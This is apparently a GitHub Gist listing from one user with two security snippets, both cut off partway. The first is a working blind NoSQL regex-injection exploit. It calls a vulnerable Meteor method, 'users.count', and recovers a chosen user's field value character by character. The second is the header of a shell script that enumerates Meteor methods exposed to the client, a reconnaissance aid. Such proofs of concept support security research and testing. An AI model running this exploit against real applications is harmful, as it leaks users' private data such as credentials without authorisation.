Skip to content

Instantly share code, notes, and snippets.

@ojasookert
ojasookert / meteor-regex-blind-nosql.js
Created Aug 2, 2019
Exfiltrate data via vulnerable Meteor method
View meteor-regex-blind-nosql.js
(function exploit(user, field, alphabet, data = '', index = 0) {
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
console.log('^' + data + alphabet[index] + '.*', res);
if (res == 0) {
index++;
} else {
data += alphabet[index];
index = 0;
}
if (index >= alphabet.length) {
@ojasookert
ojasookert / meteor-methods.sh
Last active Oct 18, 2020
A crude script to extract Meteor methods exposed to the client
View meteor-methods.sh
#!/bin/bash
# A crude script to extract Meteor methods exposed to the client.
#
# Be sure to have npm and js-beautify installed.
# - $ npm install -g js-beautify
#
# Tested on:
# - GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu)
# - Meteor 1.8.1